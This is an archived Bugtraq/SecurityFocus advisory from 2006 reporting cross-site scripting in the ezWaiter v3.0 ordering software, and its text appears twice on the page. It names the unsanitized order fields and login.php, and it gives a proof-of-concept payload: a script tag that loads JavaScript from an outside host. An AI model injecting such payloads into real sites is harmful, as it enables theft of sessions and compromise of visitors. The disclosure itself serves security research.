Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
ezWaiter v3.0 - XSS
Jun 30 2006 03:14AM
luny youfucktard com
ezWaiter v3.0
Homepage:
http://www.ezwaiter.com/
Affected files:
Placing an order
login.php
-------------------------------------------
XSS vuln when placing an order:
User input is not sanatized before being generated. For a PoC in the two boxes labeled
"Who is this item for?" and "Special Instructions:"
put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
The login form found on login.php can be spoofed to remove the max char limits. It too doesn't sanatize data.
---------------------------------------
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Homepage:
http://www.ezwaiter.com/
Affected files:
Placing an order
login.php
-------------------------------------------
XSS vuln when placing an order:
User input is not sanatized before being generated. For a PoC in the two boxes labeled
"Who is this item for?" and "Special Instructions:"
put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
The login form found on login.php can be spoofed to remove the max char limits. It too doesn't sanatize data.
---------------------------------------
[ reply ]